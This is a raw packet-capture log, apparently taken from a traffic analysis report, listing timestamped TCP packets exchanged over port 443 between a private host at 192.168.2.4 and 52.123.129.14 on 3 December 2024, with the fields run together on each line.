                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.566051006 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.566059113 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.568236113 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.568290949 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.568298101 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.572086096 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.572138071 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.572144985 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.573738098 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.573807955 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.573813915 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.576575041 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.576627016 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.576634884 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.579755068 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.579809904 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.579817057 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.582072973 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.582139969 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.582145929 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.590843916 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.590894938 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.590900898 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.631546974 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.749070883 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.749080896 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.749140024 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.749171019 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.751530886 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.751576900 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.751671076 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.751671076 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.751677990 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.753341913 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.753417969 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.753426075 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.756382942 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.756442070 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.756454945 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.758930922 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.758985043 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.758999109 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.761899948 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.761950016 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.761956930 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.764086962 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.764235020 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.764244080 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.766463995 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.766526937 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.766535997 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.769685030 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.769737959 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.769748926 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.771904945 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.771972895 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.771980047 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.775158882 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.775230885 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.775238037 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.778264046 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.778326988 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.778335094 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.781404018 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.781456947 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.781465054 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.783772945 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.783849001 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.783855915 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.786688089 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.786751986 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.786758900 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.790914059 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.790992975 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.790999889 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.840188026 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.953239918 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.953248978 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.953340054 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.953363895 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.957144976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.957153082 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.957211018 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.957221031 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.961386919 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.961421013 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.961447954 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.961452961 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.961477995 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.963707924 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.963769913 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.963774920 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.966934919 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.966991901 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.967000008 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.969942093 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.970006943 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.970014095 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.972640038 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.972702980 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.972709894 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.973860025 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.973928928 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.973934889 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.977591038 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.977648973 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.977657080 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.980242968 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.980299950 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.980307102 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.984141111 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.984208107 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.984215975 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.986530066 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.986582041 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.986592054 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.990473032 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.990530014 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.990536928 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.994301081 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.994378090 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.994385004 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.997488976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.997541904 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:24.997549057 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.002418995 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.002475023 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.002482891 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.049859047 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.063730955 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.154938936 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.154946089 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.154998064 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.155015945 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.158217907 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.158225060 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.158278942 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.158288956 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.161067009 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.161097050 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.161129951 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.161135912 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.161155939 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.165064096 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.165123940 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.165131092 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.167889118 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.167953014 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.167960882 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.171761036 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.171819925 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.171828032 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.175084114 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.175223112 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.175230026 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.178143024 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.178198099 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.178206921 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.182151079 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.182199001 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.182209015 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.185497999 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.185553074 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.185561895 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.189878941 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.189935923 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.189943075 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.193630934 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.193687916 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.193695068 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.197592974 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.197644949 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.197653055 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.201466084 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.201529026 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.201550961 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.205360889 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.205423117 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.205430984 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.214493036 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.214560032 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.214566946 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.260179043 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.358295918 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.358304024 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.358356953 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.358370066 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.362082005 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.362095118 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.362142086 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.362149954 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.365145922 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.365154982 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.365200043 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.365211964 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.368451118 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.368479013 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.368499994 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.368505001 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.368526936 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.371973038 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.372033119 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.372046947 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.375873089 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.375926971 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.375936985 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.379765034 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.379811049 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.379818916 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.384526968 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.384587049 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.384597063 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.388395071 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.388448954 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.388457060 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.393109083 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.393162966 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.393174887 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.399590969 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.399653912 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.399660110 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.403558016 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.403608084 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.403614998 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.406718969 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.406796932 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.406804085 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.409781933 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.409836054 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.409842968 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.412292004 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.412348986 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.412355900 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.414499044 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.414570093 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.414577007 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.465045929 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.558818102 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.558825970 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.558882952 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.558897972 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.560736895 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.560743093 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.560796976 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.560805082 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.563060045 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.563091040 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.563117981 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.563123941 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.563147068 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.565713882 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.565769911 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.565777063 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.568046093 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.568104029 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.568109989 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.570332050 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.570422888 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.570430040 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.572981119 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.573062897 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.573070049 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.575265884 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:25.575330973 CET49802443192.168.2.452.123.129.14
